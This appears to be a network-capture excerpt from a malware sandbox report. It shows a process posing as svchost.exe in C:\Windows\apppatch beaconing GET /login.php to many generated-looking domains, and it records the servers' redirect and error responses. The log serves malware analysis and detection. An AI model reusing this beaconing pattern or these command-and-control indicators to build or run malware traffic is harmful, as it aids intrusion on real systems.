                                                                                                                                                                                                          Sep 8, 2024 10:52:36.043420076 CEST1236INData Raw: 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 32 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70
                                                                                                                                                                                                          Data Ascii: 62e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size
                                                                                                                                                                                                          Sep 8, 2024 10:52:36.048348904 CEST1236INData Raw: 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 37 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b
                                                                                                                                                                                                          Data Ascii: lock}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.9497243.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:55.922043085 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          15192.168.2.9497253.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:55.933108091 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Sep 8, 2024 10:52:56.567173958 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:56 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          16192.168.2.949726199.191.50.83801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:52:56.249783993 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          17192.168.2.94974213.248.169.48801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.665863991 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupydeq.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.206531048 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          18192.168.2.949743188.114.96.3801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.771423101 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.503597021 CEST616INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NEX3SagEc2c8j5reoH1uxYKBo8o4IJWCHafAXOonXR54%2F8jbaMQtCoWGQxPDBGocVhoTl42%2BcmztUrL8ZS3kM2nN9Mpb57s1LcaCci1d2JHi5p9DmhxtY6byqI606g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb514aa354334-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.635484934 CEST173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.412163019 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:20.757667065 CEST793INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:20 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V80gHJfUyR3OQzy%2FL5dMt65AI7wOr2Qt2peTmQk7YGG8L880YIzQkaWcFAkaC%2BCq7jatJ6jN13WHPOvCSw7Jl6IT3xuFald%2FWPVfZkXLY%2BQMv1pgN6NhsBeQ21EvMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb522ebb64334-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          19192.168.2.94974418.208.156.248801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.917186975 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupycag.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.390430927 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=824f072929c3d77bd74be3e0de16fc8b|8.46.123.33|1725785598|1725785598|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          20192.168.2.949745103.150.11.230801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:18.301660061 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:19.674420118 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:19 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.714858055 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.240425110 CEST403INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.36.143:8001/dh/147287063_414682.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          21192.168.2.949747106.15.36.14380011512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:19.687880993 CEST289OUTGET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:53:26.713579893 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:26 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.241411924 CEST289OUTGET /dh/147287063_414682.html HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.36.143:8001
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.777810097 CEST722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          22192.168.2.94975064.225.91.73801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.136703968 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.727364063 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:28 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 593
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          23192.168.2.949751154.85.183.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.252382994 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.136063099 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:28 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
